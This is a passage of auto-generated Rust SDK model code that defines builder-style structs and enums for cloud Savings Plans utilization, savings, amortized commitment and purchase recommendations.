pub sort_order: std::option::Option<crate::model::SortOrder>,
}
impl std::fmt::Debug for SortDefinition {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("SortDefinition");
formatter.field("key", &self.key);
formatter.field("sort_order", &self.sort_order);
formatter.finish()
}
}
/// See [`SortDefinition`](crate::model::SortDefinition)
pub mod sort_definition {
/// A builder for [`SortDefinition`](crate::model::SortDefinition)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) key: std::option::Option<std::string::String>,
pub(crate) sort_order: std::option::Option<crate::model::SortOrder>,
}
impl Builder {
/// <p>The key that's used to sort the data.</p>
pub fn key(mut self, input: impl Into<std::string::String>) -> Self {
self.key = Some(input.into());
self
}
pub fn set_key(mut self, input: std::option::Option<std::string::String>) -> Self {
self.key = input;
self
}
/// <p>The order that's used to sort the data.</p>
pub fn sort_order(mut self, input: crate::model::SortOrder) -> Self {
self.sort_order = Some(input);
self
}
pub fn set_sort_order(
mut self,
input: std::option::Option<crate::model::SortOrder>,
) -> Self {
self.sort_order = input;
self
}
/// Consumes the builder and constructs a [`SortDefinition`](crate::model::SortDefinition)
pub fn build(self) -> crate::model::SortDefinition {
crate::model::SortDefinition {
key: self.key,
sort_order: self.sort_order,
}
}
}
}
impl SortDefinition {
/// Creates a new builder-style object to manufacture [`SortDefinition`](crate::model::SortDefinition)
pub fn builder() -> crate::model::sort_definition::Builder {
crate::model::sort_definition::Builder::default()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum SortOrder {
Ascending,
Descending,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for SortOrder {
fn from(s: &str) -> Self {
match s {
"ASCENDING" => SortOrder::Ascending,
"DESCENDING" => SortOrder::Descending,
other => SortOrder::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for SortOrder {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(SortOrder::from(s))
}
}
impl SortOrder {
pub fn as_str(&self) -> &str {
match self {
SortOrder::Ascending => "ASCENDING",
SortOrder::Descending => "DESCENDING",
SortOrder::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["ASCENDING", "DESCENDING"]
}
}
impl AsRef<str> for SortOrder {
fn as_ref(&self) -> &str {
self.as_str()
}
}
/// <p>The aggregated utilization metrics for your Savings Plans usage.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansUtilizationAggregates {
/// <p>A ratio of your effectiveness of using existing Savings Plans to apply to workloads
/// that are Savings Plans eligible.</p>
pub utilization: std::option::Option<crate::model::SavingsPlansUtilization>,
/// <p>The amount saved by using existing Savings Plans. Savings returns both net savings
/// from Savings Plans, as well as the <code>onDemandCostEquivalent</code> of the Savings
/// Plans when considering the utilization rate.</p>
pub savings: std::option::Option<crate::model::SavingsPlansSavings>,
/// <p>The total amortized commitment for a Savings Plans. This includes the sum of the
/// upfront and recurring Savings Plans fees.</p>
pub amortized_commitment: std::option::Option<crate::model::SavingsPlansAmortizedCommitment>,
}
impl std::fmt::Debug for SavingsPlansUtilizationAggregates {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("SavingsPlansUtilizationAggregates");
formatter.field("utilization", &self.utilization);
formatter.field("savings", &self.savings);
formatter.field("amortized_commitment", &self.amortized_commitment);
formatter.finish()
}
}
/// See [`SavingsPlansUtilizationAggregates`](crate::model::SavingsPlansUtilizationAggregates)
pub mod savings_plans_utilization_aggregates {
/// A builder for [`SavingsPlansUtilizationAggregates`](crate::model::SavingsPlansUtilizationAggregates)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) utilization: std::option::Option<crate::model::SavingsPlansUtilization>,
pub(crate) savings: std::option::Option<crate::model::SavingsPlansSavings>,
pub(crate) amortized_commitment:
std::option::Option<crate::model::SavingsPlansAmortizedCommitment>,
}
impl Builder {
/// <p>A ratio of your effectiveness of using existing Savings Plans to apply to workloads
/// that are Savings Plans eligible.</p>
pub fn utilization(mut self, input: crate::model::SavingsPlansUtilization) -> Self {
self.utilization = Some(input);
self
}
pub fn set_utilization(
mut self,
input: std::option::Option<crate::model::SavingsPlansUtilization>,
) -> Self {
self.utilization = input;
self
}
/// <p>The amount saved by using existing Savings Plans. Savings returns both net savings
/// from Savings Plans, as well as the <code>onDemandCostEquivalent</code> of the Savings
/// Plans when considering the utilization rate.</p>
pub fn savings(mut self, input: crate::model::SavingsPlansSavings) -> Self {
self.savings = Some(input);
self
}
pub fn set_savings(
mut self,
input: std::option::Option<crate::model::SavingsPlansSavings>,
) -> Self {
self.savings = input;
self
}
/// <p>The total amortized commitment for a Savings Plans. This includes the sum of the
/// upfront and recurring Savings Plans fees.</p>
pub fn amortized_commitment(
mut self,
input: crate::model::SavingsPlansAmortizedCommitment,
) -> Self {
self.amortized_commitment = Some(input);
self
}
pub fn set_amortized_commitment(
mut self,
input: std::option::Option<crate::model::SavingsPlansAmortizedCommitment>,
) -> Self {
self.amortized_commitment = input;
self
}
/// Consumes the builder and constructs a [`SavingsPlansUtilizationAggregates`](crate::model::SavingsPlansUtilizationAggregates)
pub fn build(self) -> crate::model::SavingsPlansUtilizationAggregates {
crate::model::SavingsPlansUtilizationAggregates {
utilization: self.utilization,
savings: self.savings,
amortized_commitment: self.amortized_commitment,
}
}
}
}
impl SavingsPlansUtilizationAggregates {
/// Creates a new builder-style object to manufacture [`SavingsPlansUtilizationAggregates`](crate::model::SavingsPlansUtilizationAggregates)
pub fn builder() -> crate::model::savings_plans_utilization_aggregates::Builder {
crate::model::savings_plans_utilization_aggregates::Builder::default()
}
}
/// <p>The amortized amount of Savings Plans purchased in a specific account during a
/// specific time interval.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansAmortizedCommitment {
/// <p>The amortized amount of your Savings Plans commitment that was purchased with either a
/// <code>Partial</code> or a <code>NoUpfront</code>.</p>
pub amortized_recurring_commitment: std::option::Option<std::string::String>,
/// <p>The amortized amount of your Savings Plans commitment that was purchased with an
/// <code>Upfront</code> or <code>PartialUpfront</code> Savings Plans.</p>
pub amortized_upfront_commitment: std::option::Option<std::string::String>,
/// <p>The total amortized amount of your Savings Plans commitment, regardless of your
/// Savings Plans purchase method. </p>
pub total_amortized_commitment: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for SavingsPlansAmortizedCommitment {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("SavingsPlansAmortizedCommitment");
formatter.field(
"amortized_recurring_commitment",
&self.amortized_recurring_commitment,
);
formatter.field(
"amortized_upfront_commitment",
&self.amortized_upfront_commitment,
);
formatter.field(
"total_amortized_commitment",
&self.total_amortized_commitment,
);
formatter.finish()
}
}
/// See [`SavingsPlansAmortizedCommitment`](crate::model::SavingsPlansAmortizedCommitment)
pub mod savings_plans_amortized_commitment {
/// A builder for [`SavingsPlansAmortizedCommitment`](crate::model::SavingsPlansAmortizedCommitment)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) amortized_recurring_commitment: std::option::Option<std::string::String>,
pub(crate) amortized_upfront_commitment: std::option::Option<std::string::String>,
pub(crate) total_amortized_commitment: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The amortized amount of your Savings Plans commitment that was purchased with either a
/// <code>Partial</code> or a <code>NoUpfront</code>.</p>
pub fn amortized_recurring_commitment(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.amortized_recurring_commitment = Some(input.into());
self
}
pub fn set_amortized_recurring_commitment(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.amortized_recurring_commitment = input;
self
}
/// <p>The amortized amount of your Savings Plans commitment that was purchased with an
/// <code>Upfront</code> or <code>PartialUpfront</code> Savings Plans.</p>
pub fn amortized_upfront_commitment(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.amortized_upfront_commitment = Some(input.into());
self
}
pub fn set_amortized_upfront_commitment(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.amortized_upfront_commitment = input;
self
}
/// <p>The total amortized amount of your Savings Plans commitment, regardless of your
/// Savings Plans purchase method. </p>
pub fn total_amortized_commitment(mut self, input: impl Into<std::string::String>) -> Self {
self.total_amortized_commitment = Some(input.into());
self
}
pub fn set_total_amortized_commitment(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.total_amortized_commitment = input;
self
}
/// Consumes the builder and constructs a [`SavingsPlansAmortizedCommitment`](crate::model::SavingsPlansAmortizedCommitment)
pub fn build(self) -> crate::model::SavingsPlansAmortizedCommitment {
crate::model::SavingsPlansAmortizedCommitment {
amortized_recurring_commitment: self.amortized_recurring_commitment,
amortized_upfront_commitment: self.amortized_upfront_commitment,
total_amortized_commitment: self.total_amortized_commitment,
}
}
}
}
impl SavingsPlansAmortizedCommitment {
/// Creates a new builder-style object to manufacture [`SavingsPlansAmortizedCommitment`](crate::model::SavingsPlansAmortizedCommitment)
pub fn builder() -> crate::model::savings_plans_amortized_commitment::Builder {
crate::model::savings_plans_amortized_commitment::Builder::default()
}
}
/// <p>The amount of savings that you're accumulating, against the public On-Demand rate of
/// the usage accrued in an account.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansSavings {
/// <p>The savings amount that you're accumulating for the usage that's covered by a Savings
/// Plans, when compared to the On-Demand equivalent of the same usage.</p>
pub net_savings: std::option::Option<std::string::String>,
/// <p>How much the amount that the usage would have cost if it was accrued at the On-Demand
/// rate.</p>
pub on_demand_cost_equivalent: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for SavingsPlansSavings {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("SavingsPlansSavings");
formatter.field("net_savings", &self.net_savings);
formatter.field("on_demand_cost_equivalent", &self.on_demand_cost_equivalent);
formatter.finish()
}
}
/// See [`SavingsPlansSavings`](crate::model::SavingsPlansSavings)
pub mod savings_plans_savings {
/// A builder for [`SavingsPlansSavings`](crate::model::SavingsPlansSavings)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) net_savings: std::option::Option<std::string::String>,
pub(crate) on_demand_cost_equivalent: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The savings amount that you're accumulating for the usage that's covered by a Savings
/// Plans, when compared to the On-Demand equivalent of the same usage.</p>
pub fn net_savings(mut self, input: impl Into<std::string::String>) -> Self {
self.net_savings = Some(input.into());
self
}
pub fn set_net_savings(mut self, input: std::option::Option<std::string::String>) -> Self {
self.net_savings = input;
self
}
/// <p>How much the amount that the usage would have cost if it was accrued at the On-Demand
/// rate.</p>
pub fn on_demand_cost_equivalent(mut self, input: impl Into<std::string::String>) -> Self {
self.on_demand_cost_equivalent = Some(input.into());
self
}
pub fn set_on_demand_cost_equivalent(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.on_demand_cost_equivalent = input;
self
}
/// Consumes the builder and constructs a [`SavingsPlansSavings`](crate::model::SavingsPlansSavings)
pub fn build(self) -> crate::model::SavingsPlansSavings {
crate::model::SavingsPlansSavings {
net_savings: self.net_savings,
on_demand_cost_equivalent: self.on_demand_cost_equivalent,
}
}
}
}
impl SavingsPlansSavings {
/// Creates a new builder-style object to manufacture [`SavingsPlansSavings`](crate::model::SavingsPlansSavings)
pub fn builder() -> crate::model::savings_plans_savings::Builder {
crate::model::savings_plans_savings::Builder::default()
}
}
/// <p>The measurement of how well you're using your existing Savings Plans.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansUtilization {
/// <p>The total amount of Savings Plans commitment that's been purchased in an account (or
/// set of accounts).</p>
pub total_commitment: std::option::Option<std::string::String>,
/// <p>The amount of your Savings Plans commitment that was consumed from Savings Plans
/// eligible usage in a specific period.</p>
pub used_commitment: std::option::Option<std::string::String>,
/// <p>The amount of your Savings Plans commitment that wasn't consumed from Savings Plans
/// eligible usage in a specific period.</p>
pub unused_commitment: std::option::Option<std::string::String>,
/// <p>The amount of <code>UsedCommitment</code> divided by the <code>TotalCommitment</code>
/// for your Savings Plans.</p>
pub utilization_percentage: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for SavingsPlansUtilization {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("SavingsPlansUtilization");
formatter.field("total_commitment", &self.total_commitment);
formatter.field("used_commitment", &self.used_commitment);
formatter.field("unused_commitment", &self.unused_commitment);
formatter.field("utilization_percentage", &self.utilization_percentage);
formatter.finish()
}
}
/// See [`SavingsPlansUtilization`](crate::model::SavingsPlansUtilization)
pub mod savings_plans_utilization {
/// A builder for [`SavingsPlansUtilization`](crate::model::SavingsPlansUtilization)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) total_commitment: std::option::Option<std::string::String>,
pub(crate) used_commitment: std::option::Option<std::string::String>,
pub(crate) unused_commitment: std::option::Option<std::string::String>,
pub(crate) utilization_percentage: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The total amount of Savings Plans commitment that's been purchased in an account (or
/// set of accounts).</p>
pub fn total_commitment(mut self, input: impl Into<std::string::String>) -> Self {
self.total_commitment = Some(input.into());
self
}
pub fn set_total_commitment(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.total_commitment = input;
self
}
/// <p>The amount of your Savings Plans commitment that was consumed from Savings Plans
/// eligible usage in a specific period.</p>
pub fn used_commitment(mut self, input: impl Into<std::string::String>) -> Self {
self.used_commitment = Some(input.into());
self
}
pub fn set_used_commitment(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.used_commitment = input;
self
}
/// <p>The amount of your Savings Plans commitment that wasn't consumed from Savings Plans
/// eligible usage in a specific period.</p>
pub fn unused_commitment(mut self, input: impl Into<std::string::String>) -> Self {
self.unused_commitment = Some(input.into());
self
}
pub fn set_unused_commitment(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.unused_commitment = input;
self
}
/// <p>The amount of <code>UsedCommitment</code> divided by the <code>TotalCommitment</code>
/// for your Savings Plans.</p>
pub fn utilization_percentage(mut self, input: impl Into<std::string::String>) -> Self {
self.utilization_percentage = Some(input.into());
self
}
pub fn set_utilization_percentage(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.utilization_percentage = input;
self
}
/// Consumes the builder and constructs a [`SavingsPlansUtilization`](crate::model::SavingsPlansUtilization)
pub fn build(self) -> crate::model::SavingsPlansUtilization {
crate::model::SavingsPlansUtilization {
total_commitment: self.total_commitment,
used_commitment: self.used_commitment,
unused_commitment: self.unused_commitment,
utilization_percentage: self.utilization_percentage,
}
}
}
}
impl SavingsPlansUtilization {
/// Creates a new builder-style object to manufacture [`SavingsPlansUtilization`](crate::model::SavingsPlansUtilization)
pub fn builder() -> crate::model::savings_plans_utilization::Builder {
crate::model::savings_plans_utilization::Builder::default()
}
}
/// <p>A single daily or monthly Savings Plans utilization rate, and details for your
/// account. A management account in an organization have access to member accounts. You can
/// use <code>GetDimensionValues</code> to determine the possible dimension values. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansUtilizationDetail {
/// <p>The unique Amazon Resource Name (ARN) for a particular Savings Plan.</p>
pub savings_plan_arn: std::option::Option<std::string::String>,
/// <p>The attribute that applies to a specific <code>Dimension</code>.</p>
pub attributes:
std::option::Option<std::collections::HashMap<std::string::String, std::string::String>>,
/// <p>A ratio of your effectiveness of using existing Savings Plans to apply to workloads
/// that are Savings Plans eligible.</p>
pub utilization: std::option::Option<crate::model::SavingsPlansUtilization>,
/// <p>The amount saved by using existing Savings Plans. Savings returns both net savings
/// from savings plans as well as the <code>onDemandCostEquivalent</code> of the Savings
/// Plans when considering the utilization rate.</p>
pub savings: std::option::Option<crate::model::SavingsPlansSavings>,
/// <p>The total amortized commitment for a Savings Plans. Includes the sum of the upfront
/// and recurring Savings Plans fees.</p>
pub amortized_commitment: std::option::Option<crate::model::SavingsPlansAmortizedCommitment>,
}
impl std::fmt::Debug for SavingsPlansUtilizationDetail {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("SavingsPlansUtilizationDetail");
formatter.field("savings_plan_arn", &self.savings_plan_arn);
formatter.field("attributes", &self.attributes);
formatter.field("utilization", &self.utilization);
formatter.field("savings", &self.savings);
formatter.field("amortized_commitment", &self.amortized_commitment);
formatter.finish()
}
}
/// See [`SavingsPlansUtilizationDetail`](crate::model::SavingsPlansUtilizationDetail)
pub mod savings_plans_utilization_detail {
/// A builder for [`SavingsPlansUtilizationDetail`](crate::model::SavingsPlansUtilizationDetail)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) savings_plan_arn: std::option::Option<std::string::String>,
pub(crate) attributes: std::option::Option<
std::collections::HashMap<std::string::String, std::string::String>,
>,
pub(crate) utilization: std::option::Option<crate::model::SavingsPlansUtilization>,
pub(crate) savings: std::option::Option<crate::model::SavingsPlansSavings>,
pub(crate) amortized_commitment:
std::option::Option<crate::model::SavingsPlansAmortizedCommitment>,
}
impl Builder {
/// <p>The unique Amazon Resource Name (ARN) for a particular Savings Plan.</p>
pub fn savings_plan_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.savings_plan_arn = Some(input.into());
self
}
pub fn set_savings_plan_arn(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.savings_plan_arn = input;
self
}
pub fn attributes(
mut self,
k: impl Into<std::string::String>,
v: impl Into<std::string::String>,
) -> Self {
let mut hash_map = self.attributes.unwrap_or_default();
hash_map.insert(k.into(), v.into());
self.attributes = Some(hash_map);
self
}
pub fn set_attributes(
mut self,
input: std::option::Option<
std::collections::HashMap<std::string::String, std::string::String>,
>,
) -> Self {
self.attributes = input;
self
}
/// <p>A ratio of your effectiveness of using existing Savings Plans to apply to workloads
/// that are Savings Plans eligible.</p>
pub fn utilization(mut self, input: crate::model::SavingsPlansUtilization) -> Self {
self.utilization = Some(input);
self
}
pub fn set_utilization(
mut self,
input: std::option::Option<crate::model::SavingsPlansUtilization>,
) -> Self {
self.utilization = input;
self
}
/// <p>The amount saved by using existing Savings Plans. Savings returns both net savings
/// from savings plans as well as the <code>onDemandCostEquivalent</code> of the Savings
/// Plans when considering the utilization rate.</p>
pub fn savings(mut self, input: crate::model::SavingsPlansSavings) -> Self {
self.savings = Some(input);
self
}
pub fn set_savings(
mut self,
input: std::option::Option<crate::model::SavingsPlansSavings>,
) -> Self {
self.savings = input;
self
}
/// <p>The total amortized commitment for a Savings Plans. Includes the sum of the upfront
/// and recurring Savings Plans fees.</p>
pub fn amortized_commitment(
mut self,
input: crate::model::SavingsPlansAmortizedCommitment,
) -> Self {
self.amortized_commitment = Some(input);
self
}
pub fn set_amortized_commitment(
mut self,
input: std::option::Option<crate::model::SavingsPlansAmortizedCommitment>,
) -> Self {
self.amortized_commitment = input;
self
}
/// Consumes the builder and constructs a [`SavingsPlansUtilizationDetail`](crate::model::SavingsPlansUtilizationDetail)
pub fn build(self) -> crate::model::SavingsPlansUtilizationDetail {
crate::model::SavingsPlansUtilizationDetail {
savings_plan_arn: self.savings_plan_arn,
attributes: self.attributes,
utilization: self.utilization,
savings: self.savings,
amortized_commitment: self.amortized_commitment,
}
}
}
}
impl SavingsPlansUtilizationDetail {
/// Creates a new builder-style object to manufacture [`SavingsPlansUtilizationDetail`](crate::model::SavingsPlansUtilizationDetail)
pub fn builder() -> crate::model::savings_plans_utilization_detail::Builder {
crate::model::savings_plans_utilization_detail::Builder::default()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum SavingsPlansDataType {
AmortizedCommitment,
Attributes,
Savings,
Utilization,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for SavingsPlansDataType {
fn from(s: &str) -> Self {
match s {
"AMORTIZED_COMMITMENT" => SavingsPlansDataType::AmortizedCommitment,
"ATTRIBUTES" => SavingsPlansDataType::Attributes,
"SAVINGS" => SavingsPlansDataType::Savings,
"UTILIZATION" => SavingsPlansDataType::Utilization,
other => SavingsPlansDataType::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for SavingsPlansDataType {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(SavingsPlansDataType::from(s))
}
}
impl SavingsPlansDataType {
pub fn as_str(&self) -> &str {
match self {
SavingsPlansDataType::AmortizedCommitment => "AMORTIZED_COMMITMENT",
SavingsPlansDataType::Attributes => "ATTRIBUTES",
SavingsPlansDataType::Savings => "SAVINGS",
SavingsPlansDataType::Utilization => "UTILIZATION",
SavingsPlansDataType::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&[
"AMORTIZED_COMMITMENT",
"ATTRIBUTES",
"SAVINGS",
"UTILIZATION",
]
}
}
impl AsRef<str> for SavingsPlansDataType {
fn as_ref(&self) -> &str {
self.as_str()
}
}
/// <p>The amount of Savings Plans utilization, in hours.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansUtilizationByTime {
/// <p>The time period of the request. </p>
pub time_period: std::option::Option<crate::model::DateInterval>,
/// <p>A ratio of your effectiveness of using existing Savings Plans to apply to workloads
/// that are Savings Plans eligible.</p>
pub utilization: std::option::Option<crate::model::SavingsPlansUtilization>,
/// <p>The amount saved by using existing Savings Plans. Savings returns both net savings
/// from Savings Plans as well as the <code>onDemandCostEquivalent</code> of the Savings
/// Plans when considering the utilization rate.</p>
pub savings: std::option::Option<crate::model::SavingsPlansSavings>,
/// <p>The total amortized commitment for a Savings Plans. This includes the sum of the
/// upfront and recurring Savings Plans fees.</p>
pub amortized_commitment: std::option::Option<crate::model::SavingsPlansAmortizedCommitment>,
}
impl std::fmt::Debug for SavingsPlansUtilizationByTime {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("SavingsPlansUtilizationByTime");
formatter.field("time_period", &self.time_period);
formatter.field("utilization", &self.utilization);
formatter.field("savings", &self.savings);
formatter.field("amortized_commitment", &self.amortized_commitment);
formatter.finish()
}
}
/// See [`SavingsPlansUtilizationByTime`](crate::model::SavingsPlansUtilizationByTime)
pub mod savings_plans_utilization_by_time {
/// A builder for [`SavingsPlansUtilizationByTime`](crate::model::SavingsPlansUtilizationByTime)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) time_period: std::option::Option<crate::model::DateInterval>,
pub(crate) utilization: std::option::Option<crate::model::SavingsPlansUtilization>,
pub(crate) savings: std::option::Option<crate::model::SavingsPlansSavings>,
pub(crate) amortized_commitment:
std::option::Option<crate::model::SavingsPlansAmortizedCommitment>,
}
impl Builder {
/// <p>The time period of the request. </p>
pub fn time_period(mut self, input: crate::model::DateInterval) -> Self {
self.time_period = Some(input);
self
}
pub fn set_time_period(
mut self,
input: std::option::Option<crate::model::DateInterval>,
) -> Self {
self.time_period = input;
self
}
/// <p>A ratio of your effectiveness of using existing Savings Plans to apply to workloads
/// that are Savings Plans eligible.</p>
pub fn utilization(mut self, input: crate::model::SavingsPlansUtilization) -> Self {
self.utilization = Some(input);
self
}
pub fn set_utilization(
mut self,
input: std::option::Option<crate::model::SavingsPlansUtilization>,
) -> Self {
self.utilization = input;
self
}
/// <p>The amount saved by using existing Savings Plans. Savings returns both net savings
/// from Savings Plans as well as the <code>onDemandCostEquivalent</code> of the Savings
/// Plans when considering the utilization rate.</p>
pub fn savings(mut self, input: crate::model::SavingsPlansSavings) -> Self {
self.savings = Some(input);
self
}
pub fn set_savings(
mut self,
input: std::option::Option<crate::model::SavingsPlansSavings>,
) -> Self {
self.savings = input;
self
}
/// <p>The total amortized commitment for a Savings Plans. This includes the sum of the
/// upfront and recurring Savings Plans fees.</p>
pub fn amortized_commitment(
mut self,
input: crate::model::SavingsPlansAmortizedCommitment,
) -> Self {
self.amortized_commitment = Some(input);
self
}
pub fn set_amortized_commitment(
mut self,
input: std::option::Option<crate::model::SavingsPlansAmortizedCommitment>,
) -> Self {
self.amortized_commitment = input;
self
}
/// Consumes the builder and constructs a [`SavingsPlansUtilizationByTime`](crate::model::SavingsPlansUtilizationByTime)
pub fn build(self) -> crate::model::SavingsPlansUtilizationByTime {
crate::model::SavingsPlansUtilizationByTime {
time_period: self.time_period,
utilization: self.utilization,
savings: self.savings,
amortized_commitment: self.amortized_commitment,
}
}
}
}
impl SavingsPlansUtilizationByTime {
/// Creates a new builder-style object to manufacture [`SavingsPlansUtilizationByTime`](crate::model::SavingsPlansUtilizationByTime)
pub fn builder() -> crate::model::savings_plans_utilization_by_time::Builder {
crate::model::savings_plans_utilization_by_time::Builder::default()
}
}
/// <p>Contains your request parameters, Savings Plan Recommendations Summary, and
/// Details.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansPurchaseRecommendation {
/// <p>The account scope that you want your recommendations for. Amazon Web Services
/// calculates recommendations that include the management account and member accounts if
/// the value is set to <code>PAYER</code>. If the value is <code>LINKED</code>,
/// recommendations are calculated for individual member accounts only.</p>
pub account_scope: std::option::Option<crate::model::AccountScope>,
/// <p>The requested Savings Plans recommendation type.</p>
pub savings_plans_type: std::option::Option<crate::model::SupportedSavingsPlansType>,
/// <p>The Savings Plans recommendation term in years. It's used to generate the
/// recommendation.</p>
pub term_in_years: std::option::Option<crate::model::TermInYears>,
/// <p>The payment option used to generate the recommendation.</p>
pub payment_option: std::option::Option<crate::model::PaymentOption>,
/// <p>The lookback period in days, used to generate the recommendation.</p>
pub lookback_period_in_days: std::option::Option<crate::model::LookbackPeriodInDays>,
/// <p>Details for the Savings Plans we recommend that you purchase to cover existing Savings
/// Plans eligible workloads.</p>
pub savings_plans_purchase_recommendation_details:
std::option::Option<std::vec::Vec<crate::model::SavingsPlansPurchaseRecommendationDetail>>,
/// <p>Summary metrics for your Savings Plans Recommendations. </p>
pub savings_plans_purchase_recommendation_summary:
std::option::Option<crate::model::SavingsPlansPurchaseRecommendationSummary>,
}
impl std::fmt::Debug for SavingsPlansPurchaseRecommendation {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("SavingsPlansPurchaseRecommendation");
formatter.field("account_scope", &self.account_scope);
formatter.field("savings_plans_type", &self.savings_plans_type);
formatter.field("term_in_years", &self.term_in_years);
formatter.field("payment_option", &self.payment_option);
formatter.field("lookback_period_in_days", &self.lookback_period_in_days);
formatter.field(
"savings_plans_purchase_recommendation_details",
&self.savings_plans_purchase_recommendation_details,
);
formatter.field(
"savings_plans_purchase_recommendation_summary",
&self.savings_plans_purchase_recommendation_summary,
);
formatter.finish()
}
}
/// See [`SavingsPlansPurchaseRecommendation`](crate::model::SavingsPlansPurchaseRecommendation)
pub mod savings_plans_purchase_recommendation {
/// A builder for [`SavingsPlansPurchaseRecommendation`](crate::model::SavingsPlansPurchaseRecommendation)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) account_scope: std::option::Option<crate::model::AccountScope>,
pub(crate) savings_plans_type: std::option::Option<crate::model::SupportedSavingsPlansType>,
pub(crate) term_in_years: std::option::Option<crate::model::TermInYears>,
pub(crate) payment_option: std::option::Option<crate::model::PaymentOption>,
pub(crate) lookback_period_in_days: std::option::Option<crate::model::LookbackPeriodInDays>,
pub(crate) savings_plans_purchase_recommendation_details: std::option::Option<
std::vec::Vec<crate::model::SavingsPlansPurchaseRecommendationDetail>,
>,
pub(crate) savings_plans_purchase_recommendation_summary:
std::option::Option<crate::model::SavingsPlansPurchaseRecommendationSummary>,
}
impl Builder {
/// <p>The account scope that you want your recommendations for. Amazon Web Services
/// calculates recommendations that include the management account and member accounts if
/// the value is set to <code>PAYER</code>. If the value is <code>LINKED</code>,
/// recommendations are calculated for individual member accounts only.</p>
pub fn account_scope(mut self, input: crate::model::AccountScope) -> Self {
self.account_scope = Some(input);
self
}
pub fn set_account_scope(
mut self,
input: std::option::Option<crate::model::AccountScope>,
) -> Self {
self.account_scope = input;
self
}
/// <p>The requested Savings Plans recommendation type.</p>
pub fn savings_plans_type(
mut self,
input: crate::model::SupportedSavingsPlansType,
) -> Self {
self.savings_plans_type = Some(input);
self
}
pub fn set_savings_plans_type(
mut self,
input: std::option::Option<crate::model::SupportedSavingsPlansType>,
) -> Self {
self.savings_plans_type = input;
self
}
/// <p>The Savings Plans recommendation term in years. It's used to generate the
/// recommendation.</p>
pub fn term_in_years(mut self, input: crate::model::TermInYears) -> Self {
self.term_in_years = Some(input);
self
}
